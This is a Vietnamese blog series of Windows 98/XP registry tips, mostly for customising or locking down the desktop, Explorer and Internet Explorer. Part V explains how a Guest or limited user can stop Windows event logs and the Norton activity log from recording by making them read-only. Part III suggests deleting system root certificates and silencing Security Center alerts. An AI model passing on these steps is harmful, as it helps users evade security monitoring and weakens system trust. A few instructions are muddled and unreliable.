Thứ Hai, 12 tháng 10, 2009

Kiến thức Windows Registry - Phần VIII

Không cho hiển thị Control Panel

Đối với các máy tính dung chung, để tránh cho những thiết lập của bạn bị thay đổi hay tinh chỉnh trong hệ thống thông qua Control Panel, bạn có thể ẩn Control Panel, không cho hiển thị nó bằng cách thiết lập thông số trong Registry như sau:

- Tìm đến khóa trong Registry Editor:
HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\Policies\Explorer

- Phải chuột ở cửa sổ bên phải, chọn New – Binary Value, đặt tên là: NoSetFolders

- Double click vào NoSetFolders, nhập giá trị: 01 00 00 00 vào khung Value Data của hộp thoại Edit Binary Value.

- Thoát ra và khởi động lại máy tính để xem thay đổi.

Khi bạn muốn Control Panel hiển thị trở lại, thay giá trị cho NoSetFolders là: 00 00 00 00.

Ngoài ra, ta cũng có thể cho phép hiển thị Control Panel nhưng lại ẩn đi các thành phần trong đó hoặc ngăn chặn việc thay đổi các thiết lập.

- Trong Registry Editor, tìm đến khóa:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies.

- Nhấn phải chuột vào khóa Policies ở cửa sổ bên trái, chọn New – Key, đặt tên là System.

- Phải chuột lên System rồi chọn New – DWORD Value. Tùy thuộc vào cách thiết lập cho thành phần nào trong Control Panel mà ta đặt tên cho DWORD Value vừa tao như sau: (một vài thiết lập cho Registry trong Windows 98)

- NoSecCPL: Ngăn không cho truy cập mục Password

- NoPWDPage: Ẩn giấu “Change Password”

- NoProfilePage: Ẩn phần “User profiles”

- NoDispBackgroundPage: Ẩn phần background

- NoDispScrSavPage: Ẩn phần screensaver

- NoActiveDesktopChanges: ẩn phần thay đổi desktop

- NoDevMgrPage: Ẩn phần Device Manager trong System

- NoConfigPage: Ẩn phần “Hardware Profile”.

- Nhập giá trị 1 vào khung Value Data của hộp thoại Edit DWORD Value

- Tắt Registry Editor và khởi động lại máy để thực thi thay đổi. Nếu muốn khôi phục lại thiết lập cũ, bạn chỉ cần xóa đi hoặc thay đổi giá trị là 0.

Hiển thị tên bạn trên System Tray

Đây chỉ là một mẹo nhỏ nhằm thay đổi dòng chữ AM, PM ở kế phần hiển thị thời gian của System Tray. Đầu tiên, bạn vào Registry Editor:

- Tìm đến khóa: HKEY_CURRENT_USER\Control Panel\International

- Xem bên cửa sổ bên phải, tìm giá trị s1159 (thông thường có sẵn ở Windows XP, nếu không có bạn có thể tạo New – String Value với tên s1159)

- Nhấn double click vào s1159 và điền vào tên bạn. Ví dụ: TP143

- Tìm đến giá trị thứ 2 là s2359, và điền vào tên trùng với s1159

- Tìm đến giá trị thứ 3 là sTimeFormat . double click và điền vào giá trị: hh:mm:ss:tt hoặc tt:hh:mm

- Thoát ra và khởi động lại máy để thực thi thay đổi.

Tự tạo nội dung InfoTip cho MyDocuments

Thủ thuật này hướng dẫn bạn thay đổi InfoTip hiện tại của Windows (nằm trong shell32.dll) cho MyDocuments thành nội dung tùy ý.

- Vào Registry Editor, tìm đến khóa:
HKEY_CLASSES_ROOT\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}

- Bên cửa sổ phải, nhấn double click vào InfoTip

- Thay đổi đường dẫn hiện tại trong khung Value Data của hộp thoại Edit String với nội dung mà bạn muốn. Ví dụ: MyDocuments bài viết TP143 – TTO.

- Đóng registry Editor và refesh hoăc khởi động lại máy để thực thi thay đổi.

Ẩn Documents trên menu Start

Thủ thuật này nhằm loại bỏ mục Documents (recent docs) trên Menu Start. Khi bạn mở bất kỳ một tập tin nào đó, Windows sẽ tự động lưu lại như là một recent docs mà bạn có thể truy xuất nhanh trong Documents trên menu Start. Để xóa các tập tin này, bạn có thể vào Start – Run, gõ recent rồi Enter. Cửa sổ Recent Docs sẽ xuất hiện, bạn chỉ cần lựa chọn hoặc xóa hết các tập tin shortcut này. Nếu bạn muốn khóa luôn chức năng này của Windows thì có thể làm như sau:

- Vào Registry Editor, tìm đến khóa
HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\Policies\Explorer

- Bên cửa sổ phải, phải chuột chọn New – DWORD Value, đặt tên là NoRecentDocsMenu

- Double click vào NoRecentDocsMenu, nhập vào giá trị là 1 cho Value Data của hộp thoại Edit DWORD Value

- Thoát ra và khởi động lại máy. Vào menu Start để kiểm tra.

Để hiển thị Documents trên menu Start trở lại, ta đặt giá trị cho NoRecentDocsMenu là 0.

Người đăng: vào lúc Không có nhận xét nào:
Nhãn:

Kiến thức Windows Registry - Phần VII

Tắt mở Screensaver trên desktop

Các trình screensaver (trình bảo vệ màn hình) thường hoạt động theo thời gian định trước, bạn có thể thay đổi mặc định này theo ý muốn kích hoạt hay tắt screensaver bất cứ lúc nào bằng cách:

- Mở Registry Editor, vào Start – Run, gõ “regedit”, Enter.

- Tìm đến key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ScreenSavers

- Tạo một chuỗi mới (string) và đặt tên là Mouse Corners.

- Sửa giá trị của string mới này thành –Y-N rồi nhấn F5 để thực hiện thay đổi trên registry.

- Thoát khỏi registry. Bây giờ, bạn đã có thể kích hoạt screensaver bằng cách đặt trỏ chuột tại góc trên cùng bên phải của màn hình và ngược lại, nếu muốn tắt screensaver, bạn cũng đặt trỏ chuột tại góc bên trái của màn hình.

- Nếu bạn muốn trở lại trạng thái ban đầu, chỉ cần vào lại key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ScreenSavers
và xoá Mouse Corners.

Xóa bỏ chức năng Find và Run trên Menu Start

Để ngăn ngừa việc tìm kiếm các tập tin hệ thống để chỉnh sửa hay các chương trình độc hại được kích hoạt mà người khác có thể thực hiện thông qua Find và Run trên Menu Start, bạn có thể gỡ bỏ hai chức năng này với vài thao tác trong Registry:

- Mở Registry Editor, nhấn Start – run, gõ “regedit”, Enter

- Tìm đến key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

- Phải chuột trên cửa sổ bên phải, tạo một DWORD mới với tên là NoFind

- Double click vào DWORD NoFind vừa tạo, và đặt giá trị là 1.

Thao tác vừa rồi sẽ giúp bạn gỡ bỏ chức năng FIND (tìm kiếm) trên Menu Start của Windows, và đồng thời cũng khóa phím tắt F3 cho việc tìm kiếm. Để gỡ bỏ chức năng RUN trên thanh Menu Start, bạn cũng làm theo các bước trên nhưng đặt tên của DWORD là NoRun.

Để khôi phục lại các chức năng trên, bạn chỉ cần vào lại key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer và thay đổi giá trị của DWORD NoFind hay NoRun thành 0 hoặc xoá chúng đi.

Tùy chọn mũi tên ở shorcut

Tất cả các shorcut đều có một mũi tên nhỏ màu đen ở phía dưới để phân biệt với tập tin hay thư mục gốc. Nếu bạn cảm thấy khó chịu và muốn thay đổi chúng, hãy mở Registry Editor ra và thực hiện các bước sau:

- Tìm đến key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Shell Icons

- Một danh sách các icon sẽ hiển thị bên cửa sổ phải (Có thể trong Windows 98 sẽ không có, nhưng bạn đừng quá lo, chỉ cần tạo mới).

- Tìm đến giá trị thứ 29. Nếu không có, chỉ cần tạo mới. Giá trị của chuỗi (string) này sẽ là: C:\Windows\system\shell32.dll, 29 (icon thứ 30 trong shell32.dll – icon đầu tiên bắt đầu từ 0).

- Bây giờ, bạn cần một icon trắng để thực hiện, bạn có thể tạo icon cho mình với rất nhiều chương trình như của Axelis Icon Workshop. Sau khi tạo xong icon cho riêng mình, bạn thay đổi giá trị 29 thành: C:\vsc\tp143.ico, 0 (bạn thay \vsc\tp143\ bằng đường dẫn đến tập tin icon của mình.

- Bạn cũng có thể thực hiện theo ý mình với những icon khá thú vị trong shell32.dll.

Thay đổi màu nền cho Outlook Express

Bạn đã nhàm chán với màu nền của Outloook Express, có thể chọn lựa riêng cho mình một màu thật đúng với phong cách của bạn bằng cách:

- Mở Registry Editor, và tìm đến key: HKEY_CURRENT_USER\Software\Microsoft\Internet Mail And News key.

- Bên cửa sổ trái, chọn ColorCycle và chọn Edit and Modify trong menu. Thay đổi giá trị thành 1.

- Đóng Registry Editor và Restart, sau đó bạn mở lại Outlook Express.

- Bây giờ, mỗi khi bạn sử dụng Outlook Express và tạo một tin nhắn mới, hãy giữ Ctrl-Shift và gõ phím z để chọn lựa màu sắc làm nền cho tin nhắn. Thực hiện lại thao tác trên để thay đổi màu sắc.

Ngăn Windows tải các tập tin DLL

Windows XP có một “thói quen xấu” là giữ các liên kết thư viện động (dll), chúng tận dụng khá nhiều dung lượng bộ nhớ nên có thể ảnh hưởng đến sự ổn định của hệ thống. Bạn có thể buộc Windows thay đổi “thói quen” này bằng cách:

- Mở registry Editor, tìm đến key:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer

- Tìm đến DWORD tên “AlwaysUnloadDLL”. Bạn có thể phải tạo nếu không tìm thấy bằng cách phải chuột ở cửa sổ bên phải và tạo DWORD mới với tên “AlwaysUnloadDLL”.

- Đặt giá trị thành 1 để buộc Windows không tải các tập tin thư viện động (DLL).

Người đăng: vào lúc Không có nhận xét nào:
Nhãn:

Kiến thức Windows Registry - Phần VI

Trong phần này, bạn sẽ được làm quen với cách sao lưu và phục hồi đơn giản cho registry, các thủ thuật nhỏ trong Internet Explorer và sửa chửa những tập tin bị hư một cách dễ dàng.

Sao lưu và phục hồi hệ thống Registry

Việc sao lưu hệ thống Registry rất quan trọng vì registry được xem là “trái tim” của hệ điều hành, mỗi khi bạn thực hiện một thay đổi trong registry cũng có nghĩa là bạn đã thay đổi cấu hình cho hệ thống. Khi xảy ra trục trặc, bạn có thể làm theo các bước sau để khôi phục:

- Sao lưu các giá trị Registry: Nhấn Start - chọn Run, gõ “regedit” và nhấn OK. Trong menu File, bạn chọn “Export”. Trong hộp thoại Save, chọn những hộp thoại bên dưới tùy ý để sao lưu từng nhánh giá trị hay toàn bộ hệ thống Registry. Tiếp theo, bạn chọn lựa chỗ sao lưu tập tin *.reg với tên tuỳ ý. Ví dụ: tp143system.reg.

- Khôi phục giá trị Registry: Khi cần khôi phục lại những giá trị registry đã được xuất ra (tp143system.reg), bạn chỉ cần double click vào tập tin *.reg (vd: tp143system.reg) mà bạn đã sao lưu trước.

Thủ thuật với Internet Explorer 6

- Giữ phím CTRL và sử dụng con lăn (scroll) của mouse để tăng hay giảm nhanh font chữ.

- Giữ phím SHIFT và sử dụng con lăn (scroll) của mouse để trở về (Back) hay tiến lên (Forward) giữa các trang web.

- Để thay đổi thư mục mặc định khi Download với Internet Explorer, bạn làm theo các bước sau: Nhấn Start - Run , gõ "regedit" rồi Enter để vào Registry Editor. Chọn theo đường dẫn: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer. Bên cửa sổ bên phải, ta thay đổi đường dẫn của Download Directory theo đường dẫn mà ta muốn. Hoàn tất việc thay đổi đường dẫn mặc định cho IE.

Thay đổi kích thước Icon trong Windows

Ta có thể dễ dàng thay đổi kích thước của các icon trong Windows với các bước đơn giản sau: Chọn Start – Settings – Control Panel. Nhấn đúp lên Display. Chọn thẻ Appearance. Chọn Icon từ Item: trong hộp thoại xổ xuống. Bạn có thể tinh chỉnh kích thước của icon ở phần Size. Nhấn Apply để thực thi thay đổi và OK để thoát ra.

Chú ý: Thông thường kích thước của các icon là 32x32, 16x16 hoặc có thể lớn hơn, nhưng các bạn đừng cho kích thước quá khác biệt có thể gây trục trặc cho kích thước Icon.

Thủ thuật với thư mục trong Windows

Thông thường thì Windows có thể nhớ khoảng 400 cấu hình khác nhau cho thư mục. Khi số lượng cấu hình khác nhau tăng lên hơn mức này, thì Windows sẽ tự động bỏ đi nhiều cấu hình. Bạn có thể thay đổi số 400 này thành 8000 để Windows có thể lưu trữ nhiều hơn chỉ với vài thao tác đơn giản sau:

Mở Notepad và tạo một tập tin có nội dung như sau: Windows Registry Editor Version 5.00

[-HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU]

[-HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell]

"BagMRU Size"=dword:00001f40

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam]

"BagMRU Size"=dword:00001f40

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

"NoSaveSettings"=dword:00000000

Sao lưu lại tập tin với tên là folder8000.reg , bạn nhớ để chế độ All Files cho Notepad khi save để tránh sao lưu thành một tập tin văn bản bình thường. Double Click lên folder8000.reg để nhập thông số trên vào Registry.

Sửa chửa các tập tin bị hỏng trong Windows XP

Thủ thuật này sẽ hướng dẫn bạn sửa chửa các tập tin bị hỏng trong Windows XP một cách dễ dàng. Bạn cần có CD Windows XP và hệ điều hành Windows XP đang sử dụng rồi thực hiện các bước sau: Cho CD Windows XP vào ổ CD. Bỏ qua giao diện cài đặt tự động của Windows CD. Nhấn Start , chọn Run. Gõ “sfc /scannow” (Không có dấu ngoặc kép). Windows sẽ thực hiện việc dò tìm và tải lại các tập tin bị hư hỏng.

Khóa chức năng Shutdown trong Dialog Box

Trước hết bạn cần sao lưu lại registry, sau đó, vào Registry Editor bằng cách: Vào Start – Run, gõ regedit rồi Enter. Tìm đến key:

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer

Trong cửa sổ phải, chú ý đến key “NoClose”. Nếu chưa có key “NoClose” ta có thể tạo bằng cách phải chuột ở cửa sổ phải, chọn New – String, đặt tên là “NoCloseKey”. Sau đó, ta phải chuột lên “NoCloseKey” và chọn Modify để chỉnh sửa. Gõ 1 vào ô giá trị (Value Data Box).

Khi muốn phục hồi lại như cũ, bạn chỉ cần thay đổi giá trị của “NoCloseKey” thành “0” hay xoá luôn cả giá trị “NoCloseKey”.

Chú ý: Cách thức này chỉ thực hiện được từ Windows 98 trở lên.

Không hiển thị ổ đĩa trong My Computer

Thủ thuật này có thể sẽ hữu ích cho các dịch vụ Net nhằm bảo mật thông tin với khách hàng, bạn sẽ che giấu các partition không cho hiển thị trong My Computer.

Vào Registry Editor, Start – Run, gõ regedit. Tìm đến key:

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer

Trong cửa sổ bên phải, ta phải chuột tạo New – DWORD và đặt tên là “NoDrives”. Sau đó, ta chọn “NoDrives” , phải chuột rồi chọn Modify để chỉnh sửa giá trị thành 3FFFFFF (Hexadecimal). Nhấn F5 để thực thi thay đổi. (Đôi khi phải restart lại máy để thực hiện thay đổi).

Bạn vào My Computer và sẽ thấy không có ổ nào được hiển thị. Muốn trở lại như cũ, bạn chỉ cần vào lại registry và xóa đi DWORD “NoDrives”.

Thay đổi vị trí cài đặt mặc định

Khi cài đặt các phần mềm hay các chương trình nào đó, Windows thường mặc định sẵn ổ đĩa (thường là C) nhưng bạn lại muốn Windows tự động chọn một ổ đĩa hay đường dẫn khác, ta chỉ cần tìm đến giá trị và thay đổi tùy ý bạn:

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionSetupSourcePath

Người đăng: vào lúc Không có nhận xét nào:
Nhãn:

Kiến thức Windows Registry - Phần V

Những thủ thuật nhỏ để sử dụng Windows thuận tiện hơn. Bạn nhớ sao lưu hệ thống trước khi thực hiện những thay đổi trong Registry.

Khởi động nhanh chức năng System Restore

Bạn có thể thực hiện nhanh việc khởi động chức năng System Restore của Windows trong cửa sổ Commander theo các bước sau. Chú ý: Bạn phải đăng nhập với tài khoản người quản trị (Administrator).

- Mở Start – Run – gõ cmd – Enter. Cửa sổ Windows Commander xuất hiện. Bạn gõ
%systemroot%\system32\restore\rstrui.exe. Nhấn Enter. Hộp thoại của System Restore sẽ khởi động.

Shutdown nhanh trong Windows với Shortcut

Trong Windows 95/98/ME và Windows XP, bạn phải chuột trên Desktop, chọn New – Shorcut. Cửa sổ mới xuất hiện yêu cầu bạn gõ vào đường dẫn. Nếu bạn đang sử dụng Windows 95/98/ME, ta gõ: c:\windows\rundll.exe user.exe,exitwindows (Ở đây, C: là ổ đĩa cài đặt Windows).

Nếu sử dụng Windows XP, gõ: SHUTDOWN -s - t 01. Nhấn Next và Finish. Bây giờ, mỗi khi muốn shutdown máy, bạn chỉ cần nhấn đúp lên shortcut vừa tạo trên Desktop.

Khóa chức năng lưu trữ hoạt động trên Windows XP

Đây là một thủ thuật nhỏ cho phép bạn vượt qua việc ghi lại những hoạt động trên Windows, hay do các phần mềm bảo mật như AntiVirus, tường lửa …) đối với các tài khoản giới hạn hay guest.

Đăng nhập với tài khoản bị giới hạn hay Guest trong Windows XP, vào thư mục:
C:\WINDOWS\system32\config. Bạn chỉ cần đặc lại thuộc tính cho các tập tin sau thành Readonly (hoặc nếu được cho phép thì bạn thêm thuộc tính attrib):

- AppEvent.Evt

- SecEvent.Evt

- SysEvent.Evt

Hoặc nếu bạn muốn các trình bảo mật cũng không lưu trữ lại các hoạt động trên máy của bạn như Norton AntiVirus thì vào %programfilesdir%\norton antivirus\activity.log và đặc thuộc tính Readonly và Attrib.

Người đăng: vào lúc Không có nhận xét nào:
Nhãn:

Kiến thức Windows Registry - Phần IV

Những thủ thuật nhỏ để sử dụng Windows thuận tiện hơn. Bạn nhớ sao lưu hệ thống trước khi thực hiện những thay đổi trong Registry.

Cách Reinstall Internet Explorer nhanh

Chỉ qua vài thao tác đơn giản: Cho CD WinXP vào ổ CD Rom. Click vào nút Start , chọn Run (hay nhấn phím tắt Windows + R). Hộp thoại Run xuất hiện, ta gõ:

- Rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 c:\windows\inf\ie.inf. Click Enter là xong.

Cách gỡ bỏ Windows Messenger nhanh chóng

Đối với người dùng hệ điều hành Windows XP, có thể gặp sự phiền phức khó chịu với Windows Messenger được kèm sẵn trong phiên bản XP mà rất khó gỡ bỏ. Mỗi khi Windows XP khởi động là ta lại bắt gặp Windows Messenger trong Tray Bar (phía dưới bên trái) yêu cầu nhập Username và Password. Có rất nhiều cách để gỡ bỏ Windows Messenger ra khỏi Windows. Sau đây là cách thức gỡ bỏ nhanh nhất chỉ với vài bước.

Vì Windows XP có phiên bản mới đính kèm Service Pack 1, nên ta chia làm 2 trường hợp:

+ Cách gỡ bỏ nhanh: Click vào nút Start , chọn Run (hay nhấn phím tắt Windows + R). Hộp thoại Run xuất hiện, ta gõ:
runDll32 advpack.dll,LaunchINFSection %windir%\INF\msmsgs.inf,BLC.Remove.
Nhấn Enter. Khởi động lại máy và bạn sẽ thấy sự phiền toái biến mất.

+ Gỡ bỏ trong Add/remove Programs: Vào Control Panel. Chọn Add/Remove Programs. Click lên "Add/Remove Windows Components" bên trái. Bỏ chọn "Windows Messenger". Chọn Next. Chọn Finish. Khởi động lại máy.

Thay đổi text trên Internet Explorer 6

Bạn muốn thay đổi dòng chữ nhàm chán trên Internet Explorer 6 (Microsoft Internet Explorer) bằng TP143 Internet Explorer - VSC 2005 chẳng hạn , thì chỉ cần vài bước sau với Group Policy trong Windows:

Click vào nút Start , chọn Run (hay nhấn phím tắt Windows + R). Hộp thoại Run xuất hiện, ta gõ: gpedit.msc. Chọn User Configuration > Windows Setting > Internet Explorer Maintenance > Browser User Interface. Double Click lên Browser Title. Chọn vào Customize Title Bars và sau đó điền vào dòng chữ mà bạn muốn Internet Explorer hiển thị trên thanh Title Bar. Nhấn OK và thoát ra. Bạn thử mở lại Internet Explorer để xem kết quả.

Xóa sạch Page File khi Shutdown

Khi làm việc trên PC, như sử dụng Microsoft Word, các văn bản hay các trang web được mở ra đồng nghĩa với việc những trang đó, văn bản đó được nạp vào RAM, nhưng để tiết kiệm RAM, Windows cho nhiều loại files khác nhau vào trong Pagefile (có chức năng giống bộ nhớ ảo dùng lưu trữ). Microsoft cũng cho mặc định chế độ xoá Pagefile khi shutdown là OFF, nên ta có thể thay đổi lại chế độ này theo cách sau:

Vào Registry Editor, bằng cách nhấn Start - Run, gõ regedit rồi Enter.

Chọn đến:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management.
Chọn ClearPageFileAtShutdown trên danh sách bên phải. Phải chuột , ta chọn Modify để chỉnh sửa . Thay đổi giá trị là 1 để kích hoạt chức năng xóa PageFile khi shutdown. Thoát ra và khởi động lại máy tính.

Chú ý: Chức năng này sẽ làm tăng thời gian shutdown máy của bạn, nhưng sẽ đem lại lợi ích cho việc dọn dẹp Windows System của bạn.

Cách chuyển từ FAT32 sang NTFS

Đối với phiên bản Windows NT trở lên, Microsoft cung cấp thêm định dạng NTFS với nhiều cơ chế bảo mật và lợi ích hơn. Nên khi muốn thay đổi từ bảng FAT32 sang NTFS, ta chỉ cần thao tác như sau:

Vào Start - Run, gõ cmd. Hộp thoại Windows Command sẽ xuất hiện với dấu nhắc ở C:\. Tùy theo ta muốn thay đổi (convert) cho ổ đĩa nào trên HDD mà ở đây, ví dụ là ổ C thì ta sẽ gõ:
CONVERT C: /FS:NTFS.

Tuy nhiên, cách tốt nhất là dùng 1 chương trình từ nhà sản xuất thứ 3 để làm việc này, đơn cử một chương trình khá tốt và được sử dụng rộng rãi là Partition Magic. Partition Magic sẽ giúp bạn làm nhiều việc hơn với giao diện thân thiện, dễ sử dụng.

Người đăng: vào lúc Không có nhận xét nào:
Nhãn:

Kiến thức Windows Registry - Phần III

Bạn nghĩ bạn đã am tường tất cả về Windows? Hãy cùng tham khảo một thế giới thứ hai của Windows qua những thủ thuật nhỏ mà bạn sẽ có lúc cần dùng đến.

Phục hồi biểu tượng Show Desktop trên thanh Quick Launch

Khi mở nhiều cửa số mà bạn lại muốn thoát ra nhanh bằng cách nhấn vào biểu tượng Show Desktop ở thanh Quick Launch, nhưng bạn lại vô tình xoá nó đi trước kia. Đây là cách thức khôi phục lại biểu tượng Show Desktop nhanh chóng nhất.

Bạn vào Start – Run , gõ: regsvr32 /n /i:U shell32 vào hộp thoại Open và nhấn OK. Windows sẽ tự động khôi phục cho bạn biểu tượng Show Desktop trên thanh Quick Launch.

Xóa thông tin về Windows XP Service Pack 1 trên Desktop

Đối với những bạn sử dụng Windows XP SP1 các phiên bản đầu chắc hẳn sẽ rất khó chịu với dòng chữ “Windows XP Service pack 1 Build ….”, ta có thể gỡ bỏ dòng chữ trên bằng cách tinh chỉnh vào Registry.

Công việc trước tiên là bạn cần sao lưu lại toàn bộ registry, sau đó vào Registry Editor bằng cách nhấn Start – Run – gõ regedit – Enter. Hộp thoại Registry Editor xuất hiện. Tìm đến 2 key sau đây và xoá đi:

- HKLM\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\
FEE449EE0E3965A5246F000E87FDE2A065FD89D4

- HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\
2BD63D28D7BCD0E251195AEB519243C13142EBC3

Microsoft Search không tìm tất cả các files

Khi dùng chức năng tìm kiếm files trong Windows, Windows không tìm kiếm các files không được đăng ký. Để khắc phục tình trạng này, ta có thể tinh chỉnh trong hệ thống Registry như sau:

Mở Registry Editor, tìm đến key
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ContentIndex\] và thay đổi như sau:

Value Name: FilterFilesWithUnknownExtensions
Data Type: REG_DWORD
Value: Thay đổi thành 1 để có thể tìm kiếm tất cả các files.

Khoá chức năng thông báo của Security Center trong Windows XP SP2

Sau khi cài đặt Windows XP Service Pack 2 Final, bạn sẽ thấy Microsoft có bổ sung thêm Security Center để thông báo cho người dùng về chế độ bảo mật của hệ thống như AntiVirus, Firewall … nhưng đôi khi lại gây rất khó chịu khi sử dụng. Để tắt chức năng thông báo của Security Center, ta làm như sau:

- Sao lưu Registry trước khi thực hiện.

- Mở Registry Editor bằng cách vào Start – Run – gõ regedit – Enter.

- Tìm đến key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center

Thay đổi thành 00000001 cho 3 giá trị:
AntiVirusDisableNotify; FirewallDisableNotify; UpdatesDisableNotify. Đóng Registry Editor lại và thử nghiệm.

Tạo tin nhắn của chính bạn khi khởi động

Bạn có thể tạo cho chính mình một tin nhắn hay lời chào mỗi khi khởi động, nó sẽ hiển thị trước màn hình chào mừng của Windows, nếu máy tính của bạn là một PC hay một client trong một mạng peer-to-peer.

Key:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\]
Value Name: LegalNoticeCaption
Data Type: REG_SZ
Value: Gõ dòng tin nhắn của bạn tại đây. Ví dụ: Happy to use TP143’s babe !

Người đăng: vào lúc Không có nhận xét nào:
Nhãn:

Tìm hiểu về Windows Registry - Phần II

Disk Drivers

Thay đổi thông số cảnh báo số % không gian đĩa cứng còn trống (Windows XP).

Giá trị mặc định là 10%.Key: HKEY_LOCAL_MACHINE\ System\ CurrentControlSet\ Services\ LanmanServer\ Parameters
Name: DiskSpaceThreshold.
Type: REG_DWORD (DWORD Value)
Value: 0 - 99 percent (Default is 10)


Điều khiển thông số hạn chế không gian cho Master File Table.
Giá trị mặc định là 1.Key: HKEY_LOCAL_MACHINE\ System\ CurrentControlSet\ Control\ FileSystem
Name: NtfsMftZoneReservation
Type: REG_DWORD (DWORD Value)
Value: 1 (default) - 4 (maximum)

Tắt chế độ ghi đĩa CD trực tiếp từ Window Explorer (Windows Xp)
Trong Windows XP cho phép bạn ghi một đĩa CD dễ dàng bằng cách kéo những tập tin hoặc thư mục rồi thả vào biểu tượng đĩa CDR. Bạn có thể tắt chế độ này đi.
User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer
Name: NoCDBurning
Type: REG_DWORD (DWORD Value)
Value: (0 = Allow CDR, 1 = Disable CDR)

Thay đổi tên và biểu tượng của ổ đĩa.
Key: HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Explorer\ DriveIcons
Name: Default
Type: REG_SZ (String Value)

Chỉ định chương trình chơi đĩa CD Audio.

Mặc định khi bạn đưa đĩa Cd Audio vào đĩa thì CD Player của Microsoft sẽ mở đĩa lên. Nhưng nếu có chương trình khác hay hơi bạn có thể chỉ định cho chương trình đó thay thế.
Key: HKEY_CLASSES_ROOT\ AudioCD\ Shell\ Play\ Command
Name: (Default)
Type: REG_SZ (String Value)
Value: Command-line to Execute - nhập vào đường dẫn của chương trình chơi đĩa bạn muốn.

Điền khiển chế độ tự động mở đĩa CD khi đưa đĩa vào ổ.
Key: HKEY_LOCAL_MACHINE\ SYSTEM\ CurrentControlSet\ Services\ CDRom.
Name: Autorun
Type: REG_DWORD (DWORD Value)
Value: (0=disable, 1=enable)

EXPLORER

Ẩn mục Distributed File System trong Windows Explorer
User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer.
Name: NoDFSTab
Type: REG_DWORD (DWORD Value)
Value: (0 = default, 1 = enable restriction)

Ẩn mục Security
User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer.
Name: NoSecurityTab
Type: REG_DWORD (DWORD Value)
Value: (0 = default, 1 = enable restriction)

Ẩn mục Hardware User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer.
Name: NoHardwareTab
Type: REG_DWORD (DWORD Value)
Value: (0 = default, 1 = enable restriction)

Tắt Menu New.
Tìm đến khoá sau và thêm cho nó dấu `-` sau dấu `{` :
System Key: HKEY_CLASSES_ROOT\ CLSID\ {D969A300-E7FF-11d0-A93B-00A0C90F2719}

INTERNET EXPLORER


Ẩn một số nút trên thanh ToolBar của Internet Explorer.

Cần tạo một khoá với tên là `SpecifyDefaultButtons` và gán giá trị cho nó là 1 để thực hiện cêế độ ẩn một số nút trong danh sách liệt kê bên dơới, bước kế tiếp muốn ẩn một nút bất kỳ trong danh sách bên dưới thì bạn cần tạo một khoá mới với tên nút đó và gán cho nó giá trị là 2.
- Btn_Back

- Btn_Forward

- Btn_Stop

- Btn_Refresh

- Btn_Home

- Btn_Search

- Btn_Favorites

- Btn_Folders

- Btn_Media

- Btn_History

- Btn_Fullscreen

- Btn_Tools

- Btn_MailNews

- Btn_Size

- Btn_Print

- Btn_Edit

- Btn_Discussions

- Btn_Cut

- Btn_Copy

- Btn_Paste

- Btn_Encoding

- Btn_PrintPreview


User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer
Name: SpecifyDefaultButtons
Type: REG_DWORD (DWORD Value).

Không cho phép thay đổi (Customize) trên Toolbar của Internet Explorer.

User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer
Name: NoToolbarCustomize
Type: REG_DWORD (DWORD Value)
Value: (1 = enable restriction)

Không cho hiện nút Option trong Menu Tool của Internet Explorer:User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer
Name: NoBandCustomize
Type: REG_DWORD (DWORD Value)
Value: (1 = enable restriction)

Không cho hiện một số nút trên Menu Help:

NoHelpMenu - Disable the entire help menu
NoHelpItemNetscapeHelp - Remove the ``For Netscape Users`` menu item
